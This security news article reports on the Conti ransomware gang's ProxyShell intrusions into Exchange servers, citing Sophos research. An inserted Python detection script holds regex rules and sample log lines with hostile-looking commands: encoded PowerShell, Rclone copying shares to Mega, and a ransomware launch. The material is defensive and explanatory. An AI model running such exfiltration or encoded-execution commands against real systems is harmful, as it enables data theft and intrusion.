
Conti Ransomware Gang Hacking Microsoft Exchange Servers Using ProxyShell Exploits


Researchers have uncovered a new, ongoing campaign by the Conti ransomware gang that uses ProxyShell to break into organizations' networks.

ProxyShell is an exploit chain that abuses Microsoft Exchange vulnerabilities reported over the past months; Microsoft patched them and released the update in May 2021 as part of Patch Tuesday.

Conti is one of the most ruthless ransomware gangs, and the FBI reported that it has been involved in more than 400 high-profile cyber attacks, with ransom demands as high as $25 million.

The ProxyShell attack is now being adopted by ransomware groups: the same exploit was already used by the LockFile ransomware, and it is now used by Conti.

Researchers from Sophos believe the attackers have gained experience with these techniques, which has shortened their dwell time before launching the final ransomware payload on target networks.

Conti gained access to the targeted network in under a minute and set up a remote web shell. Following this, they installed a second web shell that acts as a backup.

Thirty minutes later, the attackers generated a complete list of the computers deployed in the targeted network, along with the domain controllers and domain admins.

Within an hour of executing commands they had obtained the credentials of the domain administrator accounts; within another 48 hours they had exfiltrated about 1 terabyte of data; and finally they deployed the Conti ransomware to every machine on the network within 48 hours.

Technical Analysis

A chain of Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) was fixed in the recent April and May Exchange Server cumulative updates, which requires organizations to upgrade their Exchange servers.

But some organizations leave their Exchange servers unpatched to avoid email downtime, which exposes them to attackers who routinely scan for vulnerable systems.

Once the attackers successfully entered the network, they created a new mailbox for “administrator” and assigned it a new role using Microsoft Exchange cmdlets, which allowed them to execute shell commands remotely.

\\127.0.0.1\C$\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx

Later, the attackers created a web shell on the localhost address of the server and executed a base64-encoded PowerShell script.

In the next stage, the attackers used the encoded command to abuse the Service Control Manager to run a directory listing of the folder where the web shell had been dropped.

In the reconnaissance phase, the attackers ran another PowerShell command to retrieve the list of domain computers from a text file and to collect information about the network configuration, domain administrators, users actively connected to the system, and the process ID of the Local Security Authority Subsystem Service (LSASS), Sophos said.

Once they had collected all the necessary data, the attackers dropped an executable file (SVN.exe), executed it on the system, and established a connection to a C2 server located in Finland.

With the initial compromise done, the attackers stole credentials and then began lateral movement using an existing domain administrator account that they had cracked.

“That account was used to create an RDP connection from the Exchange server to another server. One minute later, the logs of that server show the domain admin account downloading and installing the AnyDesk remote desktop software as a service.”

Finally, the attackers deployed the file-copying utility Rclone on multiple servers with the help of a PowerShell script.

The data was then transferred to the Mega file-sharing service, using a configuration that included the addresses of the remote drives and the username and password for that account.

Exactly five days after the initial compromise, the Conti actors began deploying the ransomware and encrypting files.

“Four batch scripts (called 1help.bat, 2help.bat, 3help.bat, and 4help.bat) were run from four servers. The batch files repeatedly invoked the ransomware executable (x64.exe), with each iteration targeting specific drives on every Windows system on the network by their default file sharing names.”
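From a defender's perspective, the chain described above maps onto a handful of detection rules. The following Python example is added here and is not code from the article or from Sophos: it scans constructed sample log lines for the indicators the article names (an .aspx file under aspnet_client, mailbox/role creation for “administrator”, encoded PowerShell, Rclone pushing to Mega, and the Nhelp.bat scripts launching x64.exe). The specific Exchange cmdlet names and the log line format are assumptions.

```python
import re

# Detection rules derived from the Conti/ProxyShell chain in the article.
# Each entry: (rule name, compiled regex, rationale). Cmdlet names are assumed.
RULES = [
    ("webshell_dropped_in_aspnet_client",
     re.compile(r"\\inetpub\\wwwroot\\aspnet_client\\[^\\]+\.aspx", re.I),
     "new .aspx file in aspnet_client, the web shell location used by ProxyShell"),
    ("exchange_mailbox_role_abuse",
     re.compile(r"\b(New-Mailbox|New-ManagementRoleAssignment)\b.*administrator", re.I),
     "mailbox or management role created for 'administrator' via Exchange cmdlets"),
    ("encoded_powershell",
     re.compile(r"powershell(\.exe)?\s+.*-(enc|encodedcommand)\b", re.I),
     "base64-encoded PowerShell command line"),
    ("rclone_to_mega",
     re.compile(r"rclone(\.exe)?\b.*\bmega\b", re.I),
     "Rclone copying data to a Mega remote (exfiltration stage)"),
    ("help_bat_launches_x64",
     re.compile(r"\b[1-4]help\.bat\b.*\bx64\.exe\b", re.I),
     "Nhelp.bat batch script invoking the ransomware executable x64.exe"),
]


def scan_log(lines):
    """Return (line_number, rule_name, rationale) for every line matching a rule."""
    hits = []
    for number, line in enumerate(lines, 1):
        for name, pattern, rationale in RULES:
            if pattern.search(line):
                hits.append((number, name, rationale))
    return hits


def triggered_rules(lines):
    """Sorted set of rule names that fired; several stages firing = high confidence."""
    return sorted({name for _, name, _ in scan_log(lines)})


# Constructed sample events, not taken from the article or from Sophos telemetry.
SAMPLE_LOG = [
    "2021-09-01 10:02:11 W3SVC1 file write C:\\inetpub\\wwwroot\\aspnet_client\\aspnetclient_log.aspx",
    "2021-09-01 10:03:40 MSExchange New-ManagementRoleAssignment -Role 'Mailbox Import Export' -User administrator",
    "2021-09-01 10:05:02 services.exe cmd /c powershell.exe -nop -w hidden -enc SQBFAFgA",
    "2021-09-01 10:31:00 svchost.exe Windows Update scan completed",
    "2021-09-03 14:12:55 powershell.exe rclone.exe copy \\\\fs01\\share mega:backup --transfers 8",
    "2021-09-06 02:00:13 cmd.exe 4help.bat -> x64.exe -p \\\\ws42\\C$",
]

if __name__ == "__main__":
    for number, name, rationale in scan_log(SAMPLE_LOG):
        print(f"line {number}: {name}: {rationale}")
```

Line 4 is a benign event and should not fire; every other sample line triggers exactly one stage of the chain.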

ProxyShell and other attacks on known Microsoft Exchange vulnerabilities are extremely prevalent right now. Organizations are advised to update and patch their on-premises Exchange Servers as soon as possible.

Here are the recently released updates with the patches for the Microsoft Exchange server.


Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
